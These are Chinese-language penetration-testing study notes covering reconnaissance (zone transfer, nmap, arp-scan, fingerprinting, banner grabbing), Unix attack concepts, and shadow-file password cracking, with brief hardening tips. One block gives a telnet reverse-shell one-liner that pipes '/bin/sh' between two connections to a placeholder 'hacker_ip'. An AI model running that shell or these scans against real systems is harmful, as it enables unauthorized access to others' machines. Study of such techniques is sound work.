1
dig axfr @nsztm1.digi.ninja zonetransfer.me

网络拓扑

1
2
3
4
5
6
7
8
traceroute

# -I: ICMP, -U: UDP, -T: TCP
traceroute -I

# tells the network to route the packet through the specified gateway 
# (most routers have disabled source  routing  for  security reasons).
traceroute -g 10.10.10.5

ping 一般默认走 ICMP 协议。

ICMP（Internet Control Message Protocol，互联网控制协议）是网络层协议，但是它不像 IP 协议和 ARP 协议一样直接传递给数据链路层，而是先封装成 IP 数据包然后再传递给数据链路层。所以在 IP 数据包中如果协议类型字段的值是 1 的话，就表示 IP 数据是 ICMP 报文。IP 数据包就是靠这个协议类型字段来区分不同的数据包的。

在 IP 通信中如果某个包因为未知原因没有到达目的地址，那么这个具体的原因就是由 ICMP 负责告知。而 ICMP 协议的类型定义中就清楚的描述了各种报文的含义。

扫描

1
2
3
4
sudo arp-scan 172.19.50.0/24

# 端口扫描，-Pn 忽略主机发现，避免 ICMP 被屏蔽
nmap -Pn 172.19.50.218

协议栈指纹分析技术

协议栈指纹分析技术：Stack Fingerprinting，分主动式、被动式。

通过检查协议栈具体实现的细微差异，侦测目标设备的操作系统。

1
2
# 扫描 OS，主动式
sudo nmap -O -Pn 192.168.1.1

查点

服务指纹分析技术

1
2
# 检查某个服务的版本号
nmap -sV 192.168.1.1 -p 22

漏洞扫描器

Nessus
nmap script engine

标语抓取技术

连接到远程应用程序，并观察其输出。

1
2
3
4
telnet www.example.com 80

# netcat, TCP/IP 瑞士军刀
nc -v www.example.com 80

攻击 Unix

远程访问

缓冲区溢出攻击

堆栈缓冲区溢出
heap 缓冲区溢出

反向通道

在自己的机器上打开 nc 监听器，接受反向的 telnet 连接；
在目标机器上执行 telnet 命令，建立反向通道。

Example 1：

1
2
3
4
5
6
7
8
# 自己的机器，这个终端接受 sh 命令输入
nc -l -n -v -p 80

# 自己的机器，这个终端会打印 sh 标准输出
nc -l -n -v -p 25

# 目标机器
/bin/telnet hacker_ip 80 | /bin/sh | /bin/telnet hacker_ip 25

Security Tips
chmod 750 telnet 禁止不必要执行 telnet 的用户去执行它。

本地访问

离线口令破解

获取 /etc/shadow 文件
1. MCF 格式：$算法$salt$hash ，算法1：MD5，算法2：Blowfish
计算 hash(salt+password) ，和 shadow 文件中的值比较，匹配则破解成功

破解程序：John the Ripper，AKA: John, JTR

本地缓冲区溢出

一般以 SUID 属性的文件为目标，从而允许攻击者以 root 特权执行命令。

参考：Linux Tips

Security Tips
尽量不要设置 SUID 位。

网络安全 Network Security

踩点

DNS zone transfer 区域传送